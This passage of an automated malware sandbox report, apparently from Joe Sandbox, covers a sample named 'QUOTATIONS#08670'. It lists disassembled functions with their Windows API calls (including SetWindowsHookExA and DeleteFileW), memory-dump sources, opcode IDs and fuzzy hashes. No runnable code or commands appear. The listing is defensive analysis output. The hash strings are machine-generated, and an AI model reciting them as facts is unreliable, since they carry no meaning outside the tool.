                                                          • Instruction ID: 1bc8340bd27a8430eb6fd2847db1be5f1535cbb760d18e99a4e4cc9149d3e39f
                                                          • Opcode Fuzzy Hash: 9c4b31f39fd8be920c8dd29638bc8d5f1a7f5d4da56e1ac6df51f901523f2863
                                                          • Instruction Fuzzy Hash: 0221E4B5D002489FDB10CFAAD984ADEBBF4EB48320F14841AE918B3350D374A944CFA0
                                                          Function 06BCA268 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06BCA2F7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: 012983f367969b8811cb396c6d6847e0b03665cb64f94e7a81350a69ae374134
                                                          • Instruction ID: eac65fbef55d08f54bcdf19bd7b148d608cf941e8d98c068af1ddf38981a07c5
                                                          • Opcode Fuzzy Hash: 012983f367969b8811cb396c6d6847e0b03665cb64f94e7a81350a69ae374134
                                                          • Instruction Fuzzy Hash: 4921E6B5D002489FDB10CFA9D584ADEBFF5EB48310F14845AE954B7350D3749A55CF60
                                                          Function 06BCDC20 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCDCA3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: ed4fda615aeda0bdee07b5751e12a4243d22cf96c90698ea50a14b788f827757
                                                          • Instruction ID: 4904a1001b2f095867ba6f95ea49382da9a5a3629fd04c388b481def60ffd39a
                                                          • Opcode Fuzzy Hash: ed4fda615aeda0bdee07b5751e12a4243d22cf96c90698ea50a14b788f827757
                                                          • Instruction Fuzzy Hash: EB2113B5D002099FCB54DFAAD844BEEFBF5EF88320F10842AE419A7250C775A945CFA1
                                                          Function 01468030 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 014680A8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 2d8590e66bafe0d49129ac7d735cbc34f61021aebb398cdb5da56a140f60c1dc
                                                          • Instruction ID: 7ccb593082261e3761c7da362a68e72274d8889932c93311297ff0992ed90977
                                                          • Opcode Fuzzy Hash: 2d8590e66bafe0d49129ac7d735cbc34f61021aebb398cdb5da56a140f60c1dc
                                                          • Instruction Fuzzy Hash: E82174B1C0065A8FCB10CFAAC5447EEFBB4EF48320F15856AD818B7251D338A941CFA1
                                                          Function 06BCDC28 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06BCDCA3
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HookWindows
                                                          • String ID:
                                                          • API String ID: 2559412058-0
                                                          • Opcode ID: 1a64e9930e6c473712712bb03dd04064c295f2ea3b9df8053281494ee18b3a28
                                                          • Instruction ID: cd46792ef4803c0b47aa5a8a1c19cec5705e24bf9afabeeea4d95df3b2670b71
                                                          • Opcode Fuzzy Hash: 1a64e9930e6c473712712bb03dd04064c295f2ea3b9df8053281494ee18b3a28
                                                          • Instruction Fuzzy Hash: 1C2124B5D002099FCB54DFAAC844BEEFBF5EF88320F10842AD419A7250C775A944CFA1
                                                          Function 01468038 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000), ref: 014680A8
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: DeleteFile
                                                          • String ID:
                                                          • API String ID: 4033686569-0
                                                          • Opcode ID: 65cc2f1865b7996836198e8f1a79fa7029b3ea3fe3c0d7b062e7bad8407b075e
                                                          • Instruction ID: f56c43501dc2b9d8ba739ad95a531d96f25c0bd99b383fc5ccfe0c72e9c2b45f
                                                          • Opcode Fuzzy Hash: 65cc2f1865b7996836198e8f1a79fa7029b3ea3fe3c0d7b062e7bad8407b075e
                                                          • Instruction Fuzzy Hash: C11133B1C0061A9BCB14DF9AC544AAEFBF4EF48320F15852AD918B7250D379A944CFA1
                                                          Function 0146EDF8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 0146EE5F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2573832065.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1460000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: fea4c5be568327b4ff2726065958c16ba3b5f33a4fdf70627959e7b8f6e639f8
                                                          • Instruction ID: 9bde6b072bdc37a2c45ef47f6829d230891c7015200fe18195a93fb73012d1e3
                                                          • Opcode Fuzzy Hash: fea4c5be568327b4ff2726065958c16ba3b5f33a4fdf70627959e7b8f6e639f8
                                                          • Instruction Fuzzy Hash: CF1123B1C002599FCB10DFAAC544BDEFBF4AF48320F15812AD918B7250D378A944CFA1
                                                          Function 06BCB0FE Relevance: 1.6, APIs: 1, Instructions: 51comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: f97c2bfb48b01e063cb21517448c9f6c408015c444a40f9afba9640befdc7f59
                                                          • Instruction ID: ce88eac0a5975aa953bb2e4feb15d3d7cdd3763846f70750363964479ee37174
                                                          • Opcode Fuzzy Hash: f97c2bfb48b01e063cb21517448c9f6c408015c444a40f9afba9640befdc7f59
                                                          • Instruction Fuzzy Hash: 8E1143B0C043488FDB60DF9AC449B9EBBF8EB08320F20845EE609A7211D375A940CFA5
                                                          Function 06BC3D44 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06BC5496
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 00f828131218e271f3a1e0661886e2ab7e34fe7209cbf08c421c4b3fef9029f9
                                                          • Instruction ID: a47a2fd3d8460129e99dc634882f6d4b97173435e65e821a3a416623e85c823b
                                                          • Opcode Fuzzy Hash: 00f828131218e271f3a1e0661886e2ab7e34fe7209cbf08c421c4b3fef9029f9
                                                          • Instruction Fuzzy Hash: D51132B2C003088FDB60DF9AC444A9EFBF4EB88320F10846ED818B7210C374A655CFA0
                                                          Function 06BC5428 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 06BC5496
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 87693712097749ea92ae11ae1c50eb6cab7426bfeda02913ab492021c7850928
                                                          • Instruction ID: 90cd6dbaea190c19a4151827d059155b96fb9c99a9f9fa9089e399d77841387a
                                                          • Opcode Fuzzy Hash: 87693712097749ea92ae11ae1c50eb6cab7426bfeda02913ab492021c7850928
                                                          • Instruction Fuzzy Hash: 6C1113B6C002498FDB60DF9AD444ADEFBF4EF88320F15845AD419B7210D379A645CFA1
                                                          Function 06BCAED4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06BCB825), ref: 06BCB8AF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 478845e1c271333721044a5c98d448e8a551085dad0b84bb494eddd8469d1c60
                                                          • Instruction ID: bab828072ca2054a87343ce7a1469edd321d771b875ef3d9734be2a952603f8c
                                                          • Opcode Fuzzy Hash: 478845e1c271333721044a5c98d448e8a551085dad0b84bb494eddd8469d1c60
                                                          • Instruction Fuzzy Hash: F61103B18042498FDB50DF9AD445BDEBBF4EB48320F20845AD519B7250D375A944CFA5
                                                          Function 06BCB10C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 715613c20425c707136ac8002317faafeb4c8761291875b277af9d2a70daaf37
                                                          • Instruction ID: def1faa7073d30e59b1910d34d51971568e51f2fdd92bba647b4e2cde0ef987a
                                                          • Opcode Fuzzy Hash: 715613c20425c707136ac8002317faafeb4c8761291875b277af9d2a70daaf37
                                                          • Instruction Fuzzy Hash: E71112B18003488FDB60DF9AD549BDEBBF4EB48320F20845AE519B7210D375AA44CFA5
                                                          Function 06BCBD11 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 06BCBD6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: Initialize
                                                          • String ID:
                                                          • API String ID: 2538663250-0
                                                          • Opcode ID: 701b8787fde153ec328bf425309e35acc70cabacfa566b7756b8d1114121c8de
                                                          • Instruction ID: 2f6570305f7d519d20cd81de5c8c8cd86c1fab230aeff5a17c6427af5cc1c813
                                                          • Opcode Fuzzy Hash: 701b8787fde153ec328bf425309e35acc70cabacfa566b7756b8d1114121c8de
                                                          • Instruction Fuzzy Hash: 9D1112B5C002488FCB60DFA9D549BDEBBF4EB48320F24885AD559B7210C375AA45CFA1
                                                          Function 06BCB848 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,06BCB825), ref: 06BCB8AF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586774155.0000000006BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6bc0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID: CallbackDispatcherUser
                                                          • String ID:
                                                          • API String ID: 2492992576-0
                                                          • Opcode ID: 7d625dda2d152f16d96f28e1abda436c14443d49f46e8b650dec79179cfe7e49
                                                          • Instruction ID: 0fba88d0cc352ef214a04ea6f787b76e1b3dcc6e6b173badfb205d5fd6c3d461
                                                          • Opcode Fuzzy Hash: 7d625dda2d152f16d96f28e1abda436c14443d49f46e8b650dec79179cfe7e49
                                                          • Instruction Fuzzy Hash: BB1100B5800249CFCB20DF99D949BDEBBF4EB48324F20845AD518B7350C375A944CFA4
                                                          Function 06BE4BA9 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: XPdq
                                                          • API String ID: 0-1708276200
                                                          • Opcode ID: 0342c74f73c8b125e10a5099fbf42a71698ad6d7a809e3e2633bd863b3580933
                                                          • Instruction ID: 68fe2d9a80402bacfdd3877030af3724b960a3f6a646b7c732dd2887695518fb
                                                          • Opcode Fuzzy Hash: 0342c74f73c8b125e10a5099fbf42a71698ad6d7a809e3e2633bd863b3580933
                                                          • Instruction Fuzzy Hash: 51416E74F002099FEB559FA5C804B9EBBF6FF88700F20856AD115AB3A5DB744C05CB90
                                                          Function 06BEDB05 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: ed129c626ff13c22eb47d0053f6f81ac627cdf06971a93163a00648f940c8945
                                                          • Instruction ID: 65c9d3ef2f3e71d2ed53d2c3d66d63bf23e322ab8faf813e81368d6713fc7ca7
                                                          • Opcode Fuzzy Hash: ed129c626ff13c22eb47d0053f6f81ac627cdf06971a93163a00648f940c8945
                                                          • Instruction Fuzzy Hash: 8B41BDB4F0020A9FDB64DF75D4506AEBBB2FF85340F108569E406EB354EBB49846CB81
                                                          Function 06BE21DD Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: 9e59612220411f0e44d4cd513aa33a4cf6e71b988124d2fb0858099e98ff16a1
                                                          • Instruction ID: ca6ac3ea8daad68d7a1be2349f61b5c7a2129bb5db0ee48893917c03ee10c57f
                                                          • Opcode Fuzzy Hash: 9e59612220411f0e44d4cd513aa33a4cf6e71b988124d2fb0858099e98ff16a1
                                                          • Instruction Fuzzy Hash: 9031EF70B102018FDB699F74D51466E7BA6EF89300F2485B9E406DB3A5DF78DE02CBA1
                                                          Function 06BE21F0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PH_q
                                                          • API String ID: 0-2397113591
                                                          • Opcode ID: 716200d87d4066da13b8465ab89c84ad00df772d25e4fd2edede4c87bcbbe115
                                                          • Instruction ID: f1bd834b000d3585e44f2271f98746ef97ee53d2d2fc8c6f73239ce77b6db142
                                                          • Opcode Fuzzy Hash: 716200d87d4066da13b8465ab89c84ad00df772d25e4fd2edede4c87bcbbe115
                                                          • Instruction Fuzzy Hash: 8D31EF70B102058FDB689F74D51066E7BE6EB89600B208578D406DB399DF39DE02CBA1
                                                          Function 06BE833E Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $_q
                                                          • API String ID: 0-238743419
                                                          • Opcode ID: c7757582216b29f550c18ef1a1066337a0493a66813b3a1f64a26cd9e499bb37
                                                          • Instruction ID: 662aaabfcfd55d2b3cf9bc73157e2ea28fc0abee03efd0c70cbb2cbf0bf7a1e4
                                                          • Opcode Fuzzy Hash: c7757582216b29f550c18ef1a1066337a0493a66813b3a1f64a26cd9e499bb37
                                                          • Instruction Fuzzy Hash: 7FF0E5B5B04A01CFEF744E45E9801A97365E744352F0412F2FD00D7151D739CD10CA90
                                                          Function 06BE4AA1 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Odq
                                                          • API String ID: 0-4257893106
                                                          • Opcode ID: 6c01ceff4f7c0f0ce2070d4963524d7f9dc5922ef6a6efea509c385cc3a16b44
                                                          • Instruction ID: 2c6a702ebd6cbbb0fab4f9ec05ab33a7494f07ddf69780eb223ffebfce680dd5
                                                          • Opcode Fuzzy Hash: 6c01ceff4f7c0f0ce2070d4963524d7f9dc5922ef6a6efea509c385cc3a16b44
                                                          • Instruction Fuzzy Hash: 1DF0FE70E60119DFDB14DF94E859BAEBBB2FF48704F20412AE402A7294CBB45D42CBC0
                                                          Function 06BEC580 Relevance: .4, Instructions: 368COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a3ee66156b76a8fe54ffec1ccc5e6519c7f42448473b28c5496ba5a6ec55c28
                                                          • Instruction ID: 037c3727d4da785339907bdf122f948b440f4dc8c9aba2df9a6278d07d81f9b7
                                                          • Opcode Fuzzy Hash: 8a3ee66156b76a8fe54ffec1ccc5e6519c7f42448473b28c5496ba5a6ec55c28
                                                          • Instruction Fuzzy Hash: 94D1B274B00205CFDB54DF68D580AADBBB2FB88314F1085A9E516EB355DB39EC46CB81
                                                          Function 06BE6238 Relevance: .2, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3dcc45c8793a947ef82e5b2a0fe0b546d15992999a4c15ae71dabebd2d62a2
                                                          • Instruction ID: 37a2a9d2f4f4dc819cbb833bdc8535f0f7de1c0fecb82c328dcb1c10c5fd325c
                                                          • Opcode Fuzzy Hash: 1c3dcc45c8793a947ef82e5b2a0fe0b546d15992999a4c15ae71dabebd2d62a2
                                                          • Instruction Fuzzy Hash: 8C619DB1F400214FDB549A6EC88066FBBDAEFE4224B25447AD80EDB364EA65DD0287C1
                                                          Function 06BE42E8 Relevance: .2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c3aa8a386f3c40ab3368dfbd3cb9a9bba0dbd9e164d88d73150568722c0c0770
                                                          • Instruction ID: a652496bebf584bf6f6e0cd358aea37907766ecbbad2913006d112ebb5d9e222
                                                          • Opcode Fuzzy Hash: c3aa8a386f3c40ab3368dfbd3cb9a9bba0dbd9e164d88d73150568722c0c0770
                                                          • Instruction Fuzzy Hash: 60812A70B0020A8FDB54DFA8D59079EB7F2EF89304F108569D50AEB395EB74DC468B91
                                                          Function 06BE460C Relevance: .2, Instructions: 215COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9edada9ff244dec00f407c0d94d7db75432a1e237cef87ea6701054a51dd6336
                                                          • Instruction ID: 8ada919aef89b8c1e74466b124d019a1f8ae18ccf03f94878176b3c93294badc
                                                          • Opcode Fuzzy Hash: 9edada9ff244dec00f407c0d94d7db75432a1e237cef87ea6701054a51dd6336
                                                          • Instruction Fuzzy Hash: 07915F74E1021A8FDF60DF68C880B9DB7B1FF89300F208599D549AB395DB70AA85CF91
                                                          Function 06BE4620 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70adc5a9676c0679ad5a272773082ef395dee50da7ed8b778e1789a73044e120
                                                          • Instruction ID: 8500eb530bb9a71ed3397aaa2d005190eedaaf182eed0987627f8f7c31fa22a4
                                                          • Opcode Fuzzy Hash: 70adc5a9676c0679ad5a272773082ef395dee50da7ed8b778e1789a73044e120
                                                          • Instruction Fuzzy Hash: BF913C74E1021A8FDF60DF69C880B9DB7B1FF89300F208599D549AB295DB70AA85CF91
                                                          Function 06BEEF60 Relevance: .2, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 234bbdf4cf3fe9083182c9e9c1f52ad047427546df9bd10d4b9273babddb9ad6
                                                          • Instruction ID: 18475bf13cde6ce86158c1fa56e342725b88dcc78719d2f59e5ae20a38129ce0
                                                          • Opcode Fuzzy Hash: 234bbdf4cf3fe9083182c9e9c1f52ad047427546df9bd10d4b9273babddb9ad6
                                                          • Instruction Fuzzy Hash: 2D714BB0A002099FDB54DFA9D980AADBBF6FF84304F148469E005EB365DB34EC46CB51
                                                          Function 06BEEF70 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e8863a0686ee628dae990a4daaf5b64d26e5c473f0ddefbde0101ec157593d5d
                                                          • Instruction ID: 0eabc9221001f654cd64e29480f457069fb5c570bd475e844b30aa09d31b9ac6
                                                          • Opcode Fuzzy Hash: e8863a0686ee628dae990a4daaf5b64d26e5c473f0ddefbde0101ec157593d5d
                                                          • Instruction Fuzzy Hash: AD713BB0A002099FDB54DFA9D980AADBBF6FF84304F248469E415EB365DB34EC46CB51
                                                          Function 06BEFBF9 Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 20dafdc13139804eca3a8bd54be4721d9bc6d986d9a218b36c509f2bdfcfaf2c
                                                          • Instruction ID: 8f74655aefc7d80e5b7bbd343a1c972bf587ab8e0972f84667dc3c39df8f4734
                                                          • Opcode Fuzzy Hash: 20dafdc13139804eca3a8bd54be4721d9bc6d986d9a218b36c509f2bdfcfaf2c
                                                          • Instruction Fuzzy Hash: 0961CDB1F10105DFEB64AF78E4442BDBBB6EB84315F2088BAE50AD7350DB359856CB81
                                                          Function 06BEF9A9 Relevance: .2, Instructions: 169COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95c755d330abd1b9017739098ace5fe9c26b760e302929deb565062f84088162
                                                          • Instruction ID: 8d2ed3c4995e369703fbda0d16b7b26783df43a876c77b60607898e822d8f18f
                                                          • Opcode Fuzzy Hash: 95c755d330abd1b9017739098ace5fe9c26b760e302929deb565062f84088162
                                                          • Instruction Fuzzy Hash: DA5193B0F10205DBEF645AB8D95473F266AD789300F20597AF00AD77A9CA7CCC4583A2
                                                          Function 06BEF9B8 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2586991076.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_6be0000_QUOTATIONS#08670.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f85ad438c927367fd916e9c47cefd211d905df72920c2af0c9320f1f41069260
                                                          • Instruction ID: 98daf753d2a149184e835d0d2b2c393f16f241204b91a4fdda0d0db672c277d7
                                                          • Opcode Fuzzy Hash: f85ad438c927367fd916e9c47cefd211d905df72920c2af0c9320f1f41069260
